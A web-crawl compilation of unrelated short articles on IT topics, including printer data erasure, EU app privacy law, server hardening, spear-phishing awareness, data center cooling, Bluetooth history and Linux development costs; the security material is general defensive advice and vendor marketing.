It is not uncommon for an organization to forget the lessons of the past and repeat its sins. This is evident in regard to two lessons forgotten in initial big data efforts. First, when organizations use new data technologies they tend to make the mistake of building a new data silo because it seems to be the easiest way to get things done quickly. But data silos will hinder an organization’s ability to examine data from a variety of sources, which then makes getting long-term business value from a big data initiative even more elusive.
Second, during the initial DW wave, organizations kept trying to design data capture systems, e.g., enterprise applications, the same way they designed the DW for analytical purposes. It became best practice to design data structures differently for data capture and data analysis. Many big data initiatives are revisiting the past and trying to combine capture and analytical design – resulting in costly misuse of the new big data technologies.
Your Big Data Plan
When big data is part of your plan, remember three things: | <urn:uuid:36035d89-7645-49f8-95fa-cc68a1ab54ab> | CC-MAIN-2022-40 | https://athena-solutions.com/considerations-for-implementing-hadoop-for-your-big-data-project/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00366.warc.gz | en | 0.960213 | 927 | 2.578125 | 3 |
Investing in cyber security of connected health
Connected Health is a rapidly growing area with huge innovative possibilities and potential. This is mostly due to the uptake of digital technologies in the health and medical fields that support diagnosis, treatment and management of health conditions.
It is however crucially important that security of Connected Health products, systems and services is baked in by design. The health context also demands its own consideration of security risks and implications. Security research in Connected Health also needs to be done responsibly - fear mongering in this space could reduce public trust and uptake of potentially lifesaving and life-changing technologies.
Generally, existing security research in the connected health industry seems to be focused on three key areas: implantable medical devices, security of equipment and networks in hospitals and methods by which implantable devices can be defended while still remaining accessible to medical staff in an emergency. Connected Health however is a much broader and varied topic, with many potentially interesting application areas such as personal health care through connected devices, age-related health care and mental health.
Although purely technical solutions are of vital importance in Connected Health security, enforcing secure solutions or making security a priority will be difficult without agreed standards throughout the industry and government legislation
In our whitepaper we explore the Connected Health landscape, and present the security challenges and considerations required to deliver a Connected Health ecosystem that works for all in a secure and safe way. | <urn:uuid:ccd2217e-0422-4017-beba-b55e7137f944> | CC-MAIN-2022-40 | https://newsroom.nccgroup.com/news/investing-in-cyber-security-of-connected-health-388019 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00366.warc.gz | en | 0.965744 | 292 | 2.546875 | 3 |
Pandemic Disaster and Business Continuity Planning
Pandemic is an epidemic (a sudden outbreak) that becomes very widespread and affects a whole region, a continent, or the world. By contrast:
- An epidemic affects more than the expected number of cases of disease occurring in a community or region during a given period of time. A sudden severe outbreak within a region or a group as, for example, AIDS in Africa or AIDS in intravenous drug users.
- An endemic is present in a community at all times but in low frequency. An endemic is continuous as in the case of malaria in some areas of the world or as with illicit drugs in some neighborhoods.
In disaster planning when a pandemic occurs the data center exists but people will be in separate locations. The Disaster Planning and Business Continuity Planning processes need to make the user and business operating experience as similar as possible so that the work environment is the same in the remote site (often home) as in the office. A Key requirement is to increase remote access capabilities in addition before the pandemic occurs the following planning needs to take place:
- Define necessary staff levels for critical business processes
- Identify who can work remotely and who has to be in the office
- Validation of vaccinations for key staff members
- Identify the lights out processing issues for computer operations staff
- Identify the network and remote access capacity requirements - what percent of workers do you need to be on the system for the enterprise to continue to operate
- Train and test of users and IT staffs in how to operate from remote locations
- Require key employees to work from remote site at least once a month
- Validate broadband capacity to remote sites (home users)
- Have copies of disaster plan available in remote site
Put in place process for the synchronization of OS system patches and VPN updates - if the workstations are not used frequently disable the auto update features for security updates but maintain a process to see that they workstations are up-to-date.
Define specific requirements for security and PCI-DSS when the disaster plan is activated for a pandemic.
Define change management and version control processes to be used and how they will be controlled during the pandemic.
Once the disaster plan has been activated for a pandemic a central source for information on who is infected, immune, and unavailable needs to be developed and maintained accurately. In addition, staff members who are working in the office and data center environments should be isolated if at all possible so they do not become infected. This may require a quarantine of these employees based on the severity of the pandemic
Users Demand 24 x 7 Availability
Users demand 24 x 7 IT service availability via web sites, portals, email, and mission critical applications. When these systems and applications are not there or are operating in a degraded mode, it negatively impacts the reputation and revenue of an enterprise. Maintaining availability and preventing downtime begins with the successful deployment of network and system management solutions that are focused on IT Service Management in a Service-Oriented architecture.
When managing the help/service desk in an IT Service Management environment (ITSM) with Service-Oriented Architecture (SOA), there are four (4) things that you need to do. They are:
- Validate that you have implemented service tools versus having added unnecessary overhead and bureaucracy. Evaluate your policies, procedures, and processes from the user perspective. To be a service desk, you must serve your clients, rather than make them change what they do to meet your needs.
- Survey your users often and understand what they do not like Review the comments and listen to critics with an eye improving what you are doing. When a change is implemented go back to the critics and see if you have improved.
- Implement metrics and track performance over time Use metrics that apply to your users, see what the trends are overtime. In addition, use the same metrics to see how your competition is doing. Determine if you are providing world class service or just average service.
- Determine the cost of a service solution and its ROI before you implement it measure achievement. Be professional in implementing changes to your help/service desk. If you are constantly changing the process you will not know if your changes are having the right impact.
- Encourage input from your users Listen to your users, validate that the problem that you are solving is the one the user want solved. Listen to your clients. Tell them what you heard them tell you and what your action steps will be. After you implement the solution confirm with them what you did and how it worked. | <urn:uuid:c03c392e-ea85-47bf-84b4-0112c711ee81> | CC-MAIN-2022-40 | https://e-janco.com/newsletters/2009/20090109-pandemic-disaster-business-continuity.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00366.warc.gz | en | 0.939288 | 947 | 2.859375 | 3 |
Written By Pravin Mehta
Updated on July 22, 2022
Min Reading 3 Min
Commercial printers such as an enterprise or workgroup-class printer, typically installed in large offices and connected over a local area network, are used for printing large volumes of data in a multi-user environment. These commercial printers comprise a dedicated (removable) hard drive to store the scanned images, PDFs, and other types of documents for printing. A non-volatile memory such as traditional platter-based storage (HDD) or flash storage (SSD) allows these workgroup-class network printers to copy the documents without spooling them.
Multi-function Printer or MFP is another category of printers for dispensing multiple tasks such as printing, scanning, fax, and email. MFPs serve a similar utility like the workgroup-class printer, at a lower volume, so they might also have a dedicated hard drive for data storage. Ricoh, HP, Epson, Dell, Brother, Canon, Xerox, and Lexmark are some of the leading manufacturers of commercial printers and MFPs.
A basic understanding of the printer hard drive data storage mechanism is necessary to comprehend the potential data vulnerabilities associated with such printers. In layman terms, the printer hard drive keeps storing and queuing the printing tasks in a circular buffer, i.e., sequential units of the memory in a circular order, without deleting the previous tasks. It starts overwriting the previous tasks only after filling up the memory.
This fact means the data stored in a printer hard drive can persist in the media for days and even weeks. This data comprising print jobs, fax, copy, scan, address book, etc. is vulnerable to a cybersecurity breach or leakage due to improper disposal of the equipment. The following section outlines the threat actors:
The following are the two main data breach & leakage scenarios concerning the printers with hard drives:
Commercial printers serve multiple users on the organization’s local network, also connected to the Internet. This “network” is often the doorway for hackers to eavesdrop, who can also hijack the printer and other client machines in the network.
Imagine this scenario; the HR department in an organization store the employee onboarding forms on the printer hard drive to allow remote populating and printing of the forms. These forms continue gathering personal data of the users until the hard drive is “flushed”. Meanwhile, the HR personnel receives a few resumes as email attachments with malicious code that triggers only on the printer OS environment.
This malicious code sneaks past the malware program on the client machine and gets installed on the printer hard drive. The malware now eavesdrops all the connected nodes on the network and steals the sensitive documents stored in the printer without detection, leading to a data breach incident – detected & reported way down in the future.
This situation sounds scary, but it is possible and makes for a big chunk of the print-related data breach incidents. As per Global Print Security Landscape, 2019 report by Quocirca, 60% of businesses in the UK, the US, France, and Germany suffered a print-related data breach in 2018, incurring losses in the tunes of USD 400,000. Aside from reinforcing the upfront protection against hacking or malware through firewalls and system upgrades, you could also consider setting up a deliberate and routine practice for permanent removal of unwanted data from the printer hard drive. You can explore the printer’s built-in function for clearing the data or use the data erasure tool for systematic & permanent wiping. Read the following sections on the concept of media sanitization and data erasure technology for wiping clean the printer hard drive.
Printer data leakage may also happen due to “improper sanitization” of the hard drive when transferring the printer’s custody, as we explain next. There are several “exit points” in the printer’s lifecycle or any other electronic hardware, including computers, when the artifact changes the custody (ownership). This change of device ownership necessitates deliberate media sanitization to avoid exposure of the sensitive or confidential data stored on the device.
Media sanitization means systematic destruction of the data stored on a media such that it becomes unrecoverable using any tool or technique. Formal media sanitization methods focus on safeguarding the redundant data against the risks of exposure, misuse, and even penal actions.
For example, a commercial printer acquired on a lease may accumulate a large amount of sensitive data in the hard drive. The user or custodian organization is at immediate risk of data leakage if it fails to sanitize the printer hard drive before returning the printer. Another data leakage situation may crop up due to the disposing of an old printer without sanitizing it. For example, selling a used printer to the highest bidding vendor, donating it for charity, exchanging the device, or discarding the hardware for recycling are a few exit scenarios that can risk exposure of the sensitive data. Anybody in possession of the printer can extract (steal) the data from the hard drive, exposing the sensitive documents, faxes, copies, and print jobs.
There are several different media sanitization technologies in mainstream usage, widely categorized as Shredding, Degaussing, and Erasure. Shredding involves physical destruction of the hardware into smaller pieces such that the storage media is rendered unusable to prevent data retrieval. Shredding turns the hardware into toxic e-waste with no residual value for reuse or resale. Further, shredding is typically done off-site due to financial and logistic constraints, so the threat of data leakage remains looming while the printer hard drive is in transit to the shredding facility and until shredded.
Degaussing destroys the data by demagnetizing the magnetic storage media such as a hard disk drive. The technique turns the storage hardware inoperative, as the magnetic field is neutralized, and therefore, the media cannot store the data. Degaussing is an ineffective method to sanitize emerging magnetic storage media and flash memory-based storage devices. As per NIST SP 800-88 Guideline, “existing degaussers may not have sufficient force to degauss evolving magnetic storage media and should never be solely relied upon for flash memory-based storage devices or magnetic storage devices that contain non-volatile non-magnetic storage”. Degaussing like Shredding results in e-waste generation, and it also doesn’t work on flash storage media such as solid-state drives.
Data Erasure (also known as data wiping) involves overwriting the existing data with unique binary patterns to mutilate and desensitize it. The data erasure technique turns the overwritten data illegible to any kind of read or extract tools or techniques without affecting the storage media (hardware). The erased media can be reused or monetized through resale and therefore retains its life stage value, like a PC can be reused after fresh OS installation. The data erasure technique can sanitize hard disk drive, solid-state drive, and any other media in an operable state, and it does not generate any e-waste.
Therefore, data erasure or wiping makes the best choice for printers having a dedicated hard drive, mainly including the enterprise or workgroup-class devices and MFPs.
The good news is that there are professional data erasure software tools that can provide an easy (DIY), efficient, and compliant method for wiping the hard drives and SSDs used inside a printer. These software tools can permanently erase the hard drive, as per the prevalent data erasure standards, and ensure that no data recovery tool or technique can recover the wiped data. Professional data erasure software also provides documented proof to attest to the wiping process and its efficacy to fulfill the global regulatory norms for data protection.
For example, you can try BitRaser Drive Eraser, a commercial data wiping software designed for erasing the hard drives and SSDs used in printers, laptops or desktops, workstation computers, servers, etc. It permanently wipes the storage media based on international standards such as NIST 800-88 and DoD 3 & 7 passes. It generates tamper-proof certificates and reports of erasure to serve the regulatory mandates.
Please read our detailed & easy-to-understand software KB on how to erase your printer’s removable hard drive using BitRaser Drive Eraser. The software can start erasing the hard drive in about 10 minutes, thereby protecting your data against risks of breach and leakage.
BitRaser is NIST Certified
|US Department of Defense, DoD 5220.22-M (3 passes)|
|US Department of Defense, DoD 5200.22-M (ECE) (7 passes)|
|US Department of Defense, DoD 5200.28-STD (7 passes)|
|Russian Standard – GOST-R-50739-95 (2 passes)|
|B.Schneier’s algorithm (7 passes)|
|German Standard VSITR (7 passes)|
|Peter Gutmann (35 passes)|
|US Army AR 380-19 (3 passes)|
|North Atlantic Treaty Organization-NATO Standard (7 passes)|
|US Air Force AFSSI 5020 (3 passes)|
|Pfitzner algorithm (33 passes)|
|Canadian RCMP TSSIT OPS-II (4 passes)|
|British HMG IS5 (3 passes)|
|Pseudo-random & Zeroes (2 passes)|
|Random Random Zero (6 passes)|
|British HMG IS5 Baseline standard|
|NAVSO P-5239-26 (3 passes)|
|NCSG-TG-025 (3 passes)|
|5 Customized Algorithms & more| | <urn:uuid:c60d62c7-b1d9-431f-814b-fdee0bd480f9> | CC-MAIN-2022-40 | https://www.bitraser.com/article/innocuous-printer-can-leak-your-data.php | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00566.warc.gz | en | 0.886046 | 2,088 | 2.765625 | 3 |
Protect your customer data and your reputation with our state-of-the-art security
Secure valuable gaming revenue streams & maintain user trust with our Unity integration
Secure your e-commerce revenue & safeguard data by layering mobile app protection
Update: Find out more about the EU's General Data Protection Regulation here.In this blog series, we will shed light on the legislative framework of mobile application development in major countries and regions across the globe. The second part of the series is an analysis of EU regulations that are of concern to application developers.
Privacy is an important matter in the European law. As early as 1995, the EU adopted the Data Protection Directive (Directive 95/46/EC) to regulate the collection and processing of personal data, such as location, contacts, identity, pictures and browsing history. Organisations aren’t allowed to process personal data unless three conditions are met. Firstly, the user of a service has the right to be informed when his personal information is being processed. The controller must provide the recipients of the data. Secondly, personal data can only be processed for explicitly specified and legitimate purposes and only insofar it is relevant and not excessive in relation to these purposes. Thirdly, the data must be accurate and, if necessary, kept up to date. Extra restrictions apply when sensitive personal data is being processed, such as religious beliefs, political opinions, health or sexual orientation. Since a EU directive has to be transposed to national laws in order to have effect, all member states have enacted their own data protection legislation.
The Data Protection Directive also established the Working Party (Article 29), an independent European advisory body on data protection and privacy to promote the uniform application of the general principles of the directive in all member states. In 2013, it issued an opinion on mobile applications to address the risks that go with them. Moreover, the opinion contains some guidelines for app developers in order to tackle the insufficient protection of the personal data they process.
The E-Privacy Directive (2002/58), issued in 2002 to address the challenges of the emerging digital technologies, applies to all matters that weren’t specifically covered by the Data Protection Directive. It sets a specific standard for all parties worldwide that wish to access information stored in the devices of users in the European Economic Area (EEA). First, the Directive states that gaining access to or storing information (any type, not just personal data) is only allowed when the consumer has given consent. Furthermore, consumer consent is also needed for the installation of an application. Last, organisations are obliged to notify the Supervisory Authority as soon as they become aware of the data breach.
In 2012, the European Commission proposed to expand the Data Protection Directive in the form of the European Data Protection Regulation, which applies automatically to every individual processing data of EU citizens. One of the new measures requires mobile app developers to obtain parental consent for processing data of children younger than 13. Another measure allows data protection authorities to impose a penalty of up to 2% of the worldwide turnover of a company in case of violation of the law. After four years of amending the draft, the member states reached an agreement in December 2015. It is expected that the regulation will be formally adopted in the spring of 2016 and come into effect in 2018.
Also noteworthy is the EU-US Privacy Shield, a new framework for transatlantic data flows signed at the start of 2016. When it comes into effect, the new arrangement will provide stronger obligations on companies in the US to protect the personal data of Europeans and stronger monitoring and enforcement by the US Department of Commerce and Federal Trade Commission (FTC). The US government has given the European Union the assurance that the access of public authorities for law enforcement and national security will be subject to clear limitations and strong oversight.
Similar to Canada and the US, the EU has adopted additional laws concerning the processing of medical data. Medical devices are regulated under the Medical Devices Directive (93/42/EEC) and the In Vitro Diagnostical Medical Devices Directive (98/79/EEC; in vitro devices are used in the examination of samples taken from the human body, like blood and urine). Mobile medical applications (or mHealth applications) fall under the Directives if they have an intended “medical purpose”. The European Commission acknowledged the uncertainty of this criterion, and therefore published guidelines on the qualification and classification of medical software in 2012. In the same year, the Commission proposed revisions of the two Medical Device Directives in order to improve the safety level of medical devices. Since then the proposal became a ‘bureaucratic Frankenstein’ with many deviations from the original text, similar to the process of drafting the European Data Protection Regulation. The implementation of the new regulations is expected in 2016.
Mobile payment applications (or m-payment applications) are subject to the Payment Services Directive (2007/64/EC), which regulates payment services and payment service providers in the European Union and European Economic Area. The Directive was adopted to harmonize consumer protection and to state the rights and obligations for payment providers and users, like transparency of information (including any charges, exchange rates, transaction references and maximum execution time). However, some issues remained unaddressed. The Directive doesn’t apply to transactions to or from third countries. Furthermore, new means of payments, such as mobile banking, are often still fragmented along national borders, making it difficult for innovative payment services to provide consumers with effective, convenient and secure payment methods. Addressing the need of harmonization, the European Commission proposed a revision that focused on electronic payments. The European Parliament adopted the proposal in 2015. One of the new rules imposes strict security requirements for the initiation and processing of electronic payments and the protection of consumers’ financial data. Following the Parliament's vote, the Directive will be formally adopted by the EU Council of Ministers in the near future.
In conclusion, the European Union has addressed the protection of consumer data in many ways. However, the introduction of new techniques such as mobile applications has urged legislators to adjust the current regulations. 2016 will be an interesting year in this respect, since many of these amendments will be formally adopted.
Data Protection Directive
General Data Protection Regulation
EU-US Privacy Shield
Mobile health applications
Mobile payment applications | <urn:uuid:9ef1a241-c967-41cd-8700-488079595d61> | CC-MAIN-2022-40 | https://www.guardsquare.com/blog/legislative-framework-application-development-eu | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00566.warc.gz | en | 0.931989 | 1,282 | 2.734375 | 3 |
Information security standards such as PCI DSS and ISO 27001 and regulations such as HIPAA and CMMC mandate system hardening as one of the most basic defenses against cyber intrusions.
The reason for this should be obvious to anyone: What’s the point of implementing more advanced security measures and protections if you don’t first bolt all the unnecessary “doors” through which attackers can enter your systems and networks?
What is system hardening and what are the associated challenges?
System hardening is the process of configuring IT infrastructure – servers, databases, networks, operating systems, and applications – to minimize the organization’s attack surface, i.e., the vectors and vulnerabilities cyber attackers may exploit to gain access to and control over it.
Increased security is one of its goals, but there are others: regulatory compliance, long-term cost savings, and enhanced operational stability.
What does system hardening encompass? Let’s take server hardening as an example. According to the NIST SP 800-123 Guide to General Server Security, server hardening should include:
- Configuring the underlying OS and user authentication (e.g., disabling unneeded default accounts, creating only necessary accounts, create specific user groups with specific rights, etc.)
- Removing or disabling unnecessary services, applications, and network protocols (e.g., file and printer sharing services, system and network management tools, ports, etc.)
- Configuring appropriate access controls to resources (limit read and write access, limit execution of system-related tools to sysadmins, etc.).
Sounds simple, no? But what if you must do it all for several hundred or thousand different servers? And, most importantly, can you prevent these configurations and modifications from being inappropriately altered as time passes?
Roy Ludmir, business development manager at Isreali company CalCom, says that there are two categories of tools that can be used for server hardening (though that’s not their main purpose): compliance scanners and configuration management tools.
But while the former focus on pointing out configuration drift from specific compliance frameworks, and the latter can do that as well as enforcing hardening policies/configuration changes, they don’t provide a solution for the entire hardening process like their CalCom Hardening Suite does.
“None of them replace the need for lab testing to simulate the impact of security policies on servers before they are enforced, and none of them help reduce the complexity of change management and enforcement of multiple policies on a complex infrastructure,” he says.
In addition to that, the suite allows IT operations and IT security teams to make server hardening a continuous process rather than a one-time task, as well as to maintain their organization’s compliance posture over time, despite updated policies and changes introduced in the infrastructure.
Server hardening minimizes the risk of infrastructure downtime
Organizations that juggle more than a couple of hundred of servers with a multitude of configuration options and must deal with a constantly changing infrastructure can’t hope to manually perform constant and thorough server hardening.
Just think about it:
- A hardening project must start with an analysis of the impact hardening policies will have on the production infrastructure before any configuration changes are made (Never test hardening on production servers!)
- Different hardening policies must be implemented for different systems (and mistakes avoided or easily rolled back)
- Constant policy and infrastructure updates might affect the compliance posture, meaning compliance-focused scanning should be near-constant.
Of these, the step that’s most difficult to perform quickly and accurately is the impact analysis.
To see how your hardening policies will affect your production environment, you need to build a test environment that will accurately reflect its complexity, as well as simulate the traffic, the number of users in the network, and various dependencies. This is a grueling task to perform manually, and there’s a high chance of error that could lead to costly production downtime.
CalCom Hardening Suite minimizes this risk thanks to its automated processes. After its software agents are installed on the servers, it starts the so-called learning mode, during which it collects data from different sources on the machines and analyzes it to understand how the proposed policies will impact system operations.
The resulting report lists each proposed policy, its desired value, and its current value. If these values match, it means that no changes will happen when the policy is enforced. If they don’t, the solution differentiates between values that will be changed when enforcing the policy with no impact on server operation, and values that, if changed, will lead to production server disruption.
Based on this analysis, the solution creates the optimal policy implementation plan for each server that will maximize policy compliance while avoiding impact to production.
The next step – policy enforcement/implementation – is often performed by organizations via configuration management tools and Group Policy Objects (GPOs). If the policies are maximally granular – as they should be to suitably harden the different environments, machine types and roles – this can also be a time-consuming nightmare for IT operations teams that don’t have an automated solution at their disposal.
CHS, on the other hand, can push configuration changes on the entire production server fleet from a single point of control. This enables organizations to assign the privileges needed to change system configurations only to a minimal number of users, thus minimizing human error.
Finally, CHS prevents configuration changes that are against the enforced policies – no matter whether they are performed by malicious actors or are the result of a simple error. It also notifies the security team about the attempt to change the configuration by sending alerts to a SIEM or SOC solutions in use.
CalCom Hardening Suite is available for servers, middleware applications and endpoints.
Keren Pollack, CalCom’s marketing manager, says that their clients are mostly insurance companies, financial institutions, healthcare companies, and DoD contractors – companies that must comply with regulation that requires system hardening. Companies that support critical infrastructure are also prospective clients.
Customers can use the solution with minimal support from CalCom, but the company also offers additional guidance and advice to customers, if needed.
“We have the in-house knowledge to help organizations build effective system hardening policies. They are usually based on our own hardening recommendations, special organizational needs, and industry best practices and benchmarks (e.g., CIS, NIST, DISA STIGs, and so on),” Pollack explained.
“After the initial policies are defined, the organization needs to have another policy discussion after CHS’s learning process is done, to decide what they are going to do about each hardening action they can’t implement without adversely affecting production. We can be involved in this process and help them choose the right course of action.” | <urn:uuid:ef4931fb-927c-4a51-a679-587212f788f6> | CC-MAIN-2022-40 | https://www.helpnetsecurity.com/2021/11/15/server-hardening-automation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00566.warc.gz | en | 0.926531 | 1,429 | 2.65625 | 3 |
Prefer to listen to this piece?
What do you think is the greatest threat to your company’s cybersecurity? Would you say weak passwords? Unsecured WiFi? Unsafe usage of IoT devices? Those are some pretty good guesses, but the top security threat to your company’s system is you.
Email “phishing” attacks are still among the top cybersecurity threats to companies of all sizes. You’re probably saying, “I’m not clicking on anything that’s not directly sent for me”, that wisdom is still no defense for one of the most prevalent cybersecurity schemes: spear phishing.
“How is spear phishing different from regular phishing?”
The difference between a typical phishing scheme and a spear-phishing scheme is the precision of the attack.
Much like a fisherman drops a baited line, waiting for any fish who happens to be swimming by to take the bait, classic phishing occurs when some form of cyber threat sends out many emails containing malicious software links to a group — whether it’s a certain company or the contact list of their latest victim. When the victim interacts with the email, their systems typically become infected if preventative measures are not taken. While scary, many people would recognize an old fashion style phishing email if it landed in their inbox. In fact, most of the dead giveaways of a phishing email would typically be caught by your email client.
Spear Phishing Definition
As the name implies, spear phishing is a style of cyber-attack where the attacker targets a specific individual victim instead of whoever happens to take the bait. A nautical spear fisherman doesn’t just fill the sea with spears, hoping to hit a fish. They take their time, looking to find a fish worth pursuing. They know where the fish can be found and how they behave. Much like the actual nautical spear fisherman, an online spear phishing attacker has a good amount of knowledge about their specific target.
Spear phishing has become increasingly easier for attackers due to the wealth of information available about the average person online. From social media accounts to company website profiles and more, a spear phisher is armed with enough knowledge to attack victims through familiarity.
Spear phishers use details about the victim’s life that the victim assumed only friends, family, co-workers, personal banks, healthcare providers or even government agencies would know about them. When targets let their guard down, that’s when the threat is able to get their victim to divulge information or allow access to a malicious stranger they assume is legitimate.
“How do I protect myself against a spear-phishing attack?”
It's easy to feel helpless against spear phishing in this day and age. Who are we to trust? Here are some quick tips to help protect you against a spear-phishing attempt.
Even if an email sender looks familiar, double-check the address.
A favorite spear-phishing technique is to mask the true sender’s email address to avoid suspicion. Certain emails requesting you engage with links or submit sensitive information may be phishing schemes from familiar-looking email addresses. Double-check to make sure that an email address truly belongs to the person they claim to be. When in doubt, simply call the phone number you already have on file for them or through the organization's official website. Never use the phone number provided by a suspected spear phisher.
Don’t send confidential information over email.
Most companies, banks, healthcare providers, or government agencies will never request that you submit sensitive data via email. Even if there is a link provided to visit a website to submit such requested information, remain skeptical. Hover over any links before clicking on them to make sure they are hyperlinked to a website address you know to be correct. Again, when in doubt, call ahead.
When in doubt, double-check on your end.
If you receive a request from a familiar bank, government agency, or other organization requesting you to take any action that may put sensitive data at risk (for example, a request for you to update your password), do not initially engage with the email. Instead, reach out to the organization through the contact details you know to be correct (a phone number on your bank card or health insurance card, etc.) to verify that this request came from them.
Watch what you post online.
This is as good a time as ever to reaccess not only your behavior on social media but also your security settings. Limit posting personal details that can be used by spear-phishers in later attacks. Thoroughly examine the privacy settings of your social media accounts. There’s a good chance that more information is available about you for anyone to acquire than you thought. Periodically search for yourself online to see what is available.
Always assume you’re being phished.
Until an email sender can successfully prove that they are who they claim to be, the safest thing you can do is simply assume that every request for sensitive information is a phishing scheme. Being proactive and vigilant against cybersecurity threats greatly decreases your chances of falling victim. | <urn:uuid:38989d5d-7433-4aea-8391-bb90aac7b37f> | CC-MAIN-2022-40 | https://www.jdyoung.com/resource-center/posts/view/182/what-is-spear-phishing-jd-young | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00566.warc.gz | en | 0.936448 | 1,074 | 2.65625 | 3 |
An innovative University of Hull cooling system has helped Hull City Council reduce electricity consumption at its data center by up to 80 per cent.
Using a super-performance Dew Point Cooling system, developed at the University’s Centre for Sustainable Energy Technologies, Hull City Council have made huge savings in electricity cooling costs and reduced their carbon footprint.
The technology was first tested at the University’s Aura Innovation Centre in Hessle before the trial was extended to Hull City Council’s data center.
Dr Zishang Zhu, a senior research fellow at the University of Hull, said: “This project is the culmination of 15 years of work at the University, developing the technology to a point where we could demonstrate its potential at our own Aura Innovation Centre.
“After the success of that pilot project, the next step was applying the same technology to Hull City Council’s data center. The savings, both in carbon emissions and cost, have been impressive.
“We have now been able to demonstrate, in a real-world environment, the potential this cooling technology can have. It offers enormous benefits to companies, both from an environmental and financial point of view.”
The Dew Point Cooling technology can lead to an 80-90 per cent reduction in electricity consumption and carbon emissions compared to traditional cooling systems.
For the project, two 4kW dew point coolers were installed at the Aura Innovation Centre, to service its computer room.
The second pilot – at Hull City Council’s data center – saw the installation of a 100kw cooling system.
The technology will save the council £149 per day in its electricity cooling costs which is equivalent to £54,000 per year. | <urn:uuid:5b7eb5d0-1d54-485e-89e3-cca14f1a0b40> | CC-MAIN-2022-40 | https://digitalinfranetwork.com/news/hull-city-council-data-center-reduces-electricity-consumption-and-cuts-co2-emissions-with-university-of-hull-cooling-technology/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00566.warc.gz | en | 0.949293 | 352 | 2.59375 | 3 |
Bluetooth is a wireless technology that links devices over short distances using short-wavelength UHF radio waves in the ISM band from 2.4 to 2.485 GHz. We use it to connect wireless mice and headsets and sometimes to sync data across devices like phones or computer or stereos.
Bluetooth technology was initiated in 1989 in Sweden by a team working for Ericsson and finally released in 1997 after the industry standards were establish by a consortium or companies including Intel and Ericsson. It was originally going to be called Business -RF or MC-Link… but after two of the top engineers from Intel and Ericsson went out for a night of drinking and started talking about history, it was dubbed Bluetooth.
Harald Bluetooth was a medieval king who united Denmark and Christianized the Danes a thousand years ago. The point of this technology is to unite devices and that’s what ole King Bluetooth did so, meh… why not?
The symbol of the technology is a combination of two runic symbols H+B (Harald Bluetooth).
…pretty cool, huh? …bet you didn’t know that!
Here at Frankenstein we know a lot more than just useless trivia like this. If you’re having problems with your devices (Bluetooth or otherwise), give us a call or stop by; we’re happy to help!
Frankenstein Computers has been taking care of our happy clients since 1999. We specialize in IT Support, IT Service, MAC repair, PC Repair, Virus Removal, and much more. | <urn:uuid:865493ad-015d-4868-9235-5be05d0c4b27> | CC-MAIN-2022-40 | https://www.fcnaustin.com/bluetooth-1000-years-old/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00566.warc.gz | en | 0.949274 | 319 | 2.828125 | 3 |
You may have noticed the increase in the number of smartphone threats, malware and viruses being reported as of late. It hasn’t gone unnoticed by researchers either, as Tom’s Guide recently described what it calls the “the Center for Disease Control, only for Android malware.” North Carolina State researchers launched the Android Malware Genome Project to look at the evolution and characteristics of malware on Android to better understand future generations and better protect devices.
“The popularity and adoption of smartphones has greatly stimulated the spread of mobile malware, especially on the popular platforms such as Android,” the Android Malware Genome Project’s website said. “In light of their rapid growth, there is a pressing need to develop effective solutions. However, our defense capability is largely constrained by the limited understanding of these emerging mobile malware and the lack of timely access to related samples.”
Xuxian Jiang, the leader of the project, told Tom’s Guide that as users of Android have found, there’s a lot of malware samples out there in the wild and not really too much understanding of what makes any of it tick. This is important, as antivirus programs and other systems that look to protect phones need to know how to attack the virus or other exploit.
“Basically, at this stage, we want to open up first our current collection of Android malware samples and make them available to research community,” Jiang told the news source. “The purpose is to engage the research community to better our understanding of mobile threats and develop effective solutions against them.”
NC State has collected 1,200 Android samples which will be shared with Genome Project participants. They will look to see what they can do with these viruses before showing the public their findings and research. The news source said Jiang told the IEEE Symposium on Security and Privacy in San Francisco earlier this month that defense of Android devices is limited due to the lack of understanding, so the researchers want to have a hand in developing next-generation mobile security solutions to help protect individual users and businesses.
For all you Android users out there, what approach do you take regarding security? Do you have any kind of security solution or application control to help keep malware and other threats off your device? Let us know in the comments! | <urn:uuid:9011e1bb-a73c-4241-86d5-411afb62bf9f> | CC-MAIN-2022-40 | https://www.faronics.com/news/blog/anatomy-of-android-malware | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00566.warc.gz | en | 0.940334 | 474 | 3.015625 | 3 |
The Linux Foundation has updated the 2001 study of David Wheeler which looks at the approximate cost of developing a typical Linux distribution using a methodology based on the total number of software lines of code (SLOC) present in the distribution.
The tool the Linux Foundation used, SLOCCount (opens in new tab), calculated back then that the cost of developing Red Hat Linux 7.1 would be around USD 1.2 billion based on the 30 million physical source lines of code in the operating system.
Applying the same tool to the Fedora 9 Distribution shows that the price of building a Linux distribution has now gone up by 900 percent to reach USD 10.8 billion with the cost of building the Linux Kernel alone costing a staggering USD 1.4 billion.
The authors of the study took into consideration that it would take 59389 person-years of coding to churn out 204.5 million lines of codes and also used the average cost per coder of USD 75662, adding a further 140 percent overhead to cover benefits and other charges.
Overall, the Linux operating system represents a USD 25 billion ecosystem according to the same report.
The foundation also found out that more than 1000 developers from more than 100 companies - including quite a few Fortune 500 companies - contribute regularly to the Linux Kernel.
SLOCCount uses an industry standard called COnstructive COst MOdel (COCOMO) which is an "algorithmic Software Cost Estimation Model5" developed by Barry Boehm.
To put that in perspective, Windows Operating System probably cost the world several hundreds of billions of dollars in terms of sales and development time over two decades.
